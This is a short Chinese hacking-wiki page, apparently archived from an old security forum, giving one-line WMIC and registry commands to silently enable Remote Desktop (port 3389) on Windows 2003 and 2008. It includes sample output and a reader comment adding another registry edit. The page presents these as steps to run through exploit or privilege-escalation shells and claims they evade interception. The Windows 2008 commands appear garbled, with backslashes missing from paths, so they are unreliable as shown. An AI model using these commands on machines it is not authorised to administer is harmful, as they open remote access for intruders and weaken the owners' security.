侧边栏
习科旧站:一句命令开3389
网上流传了很多开3389的exe小工具,还有读写注册表的bat批处理,有的是操作注册表,有的是操作各种组件
这里提供一个不会被拦截,而且可以使用的开3389的cmd一句话
Win 2003:
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
不管你是溢出提权工具,还是 wscript.shell 或者是 system() , exec() 等等,都可以用这个来尝试开启3389
亲测比批处理好用多了
测试回显
正在安装 WMIC,请稍候。执行 (\\JOINR410-1\ROOT\CIMV2:Win32_TerminalServiceSetting.ServerName="JOINR410-1")->SetAllowTSConnections()
方法执行成功。
输出参数:
instance of __PARAMETERS
{
ReturnValue = 0;
};
Win 2008
wmic /namespace:\rootcimv2terminalservices path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1 wmic /namespace:\rootcimv2terminalservices path win32_tsgeneralsetting where (TerminalName ='RDP-Tcp') call setuserauthenticationrequired 1 reg add "HKLMSYSTEMCurrentControlSetControlTerminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
习科旧站/一句命令开3389.txt · 最后更改: 2020/05/16 19:19 (外部编辑)
页面工具
评论
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal“ “Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
cmd执行开3389不用重启! 这个也好用!